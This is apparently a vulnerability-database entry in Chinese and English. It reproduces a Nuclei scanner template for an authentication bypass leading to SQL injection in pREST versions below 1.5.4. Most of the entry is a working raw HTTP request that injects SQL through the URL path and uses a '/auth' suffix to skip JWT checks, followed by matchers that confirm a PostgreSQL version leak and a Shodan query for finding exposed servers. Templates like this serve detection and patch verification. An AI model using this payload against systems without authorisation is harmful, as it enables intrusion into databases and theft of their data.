漏洞描述
An authentication bypass vulnerability was introduced by changing the JWT whitelist configuration to use a regex pattern, allowing unauthorized access to any path containing /auth and leading to SQL Injection.
prest-sqli-auth-bypass: pREST < 1.5.4 - SQL Injection Via Authentication Bypass
PoC代码[已公开]
id: prest-sqli-auth-bypass
info:
name: pREST < 1.5.4 - SQL Injection Via Authentication Bypass
author: mihail8531,iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
An authentication bypass vulnerability was introduced by changing the JWT whitelist configuration to use a regex pattern, allowing unauthorized access to any path containing /auth and leading to SQL Injection.
reference:
- https://github.com/advisories/GHSA-wm25-j4gw-6vr3
metadata:
verified: true
max-request: 1
shodan-query: html:"authorization token is empty"
tags: sqli,prest,auth-bypass,sqli,vuln
variables:
database: "{{database}}"
http:
- raw:
- |
GET /{{database}}/information_schema".tables)s%20where%201=version()::int--/auth HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'pq: invalid input syntax for type integer: \"PostgreSQL '
- type: word
part: content_type
words:
- 'application/json'
# digest: 4a0a0047304502202f2f600491f4419ec9cbee88330433452dd222db375ffa91052ad85f3e8b1448022100c12ca182c098a067a287fe7fd58786f610375395bc4e07503f083f0c61cc11b7:922c64590222798bb761d5b6d8e72950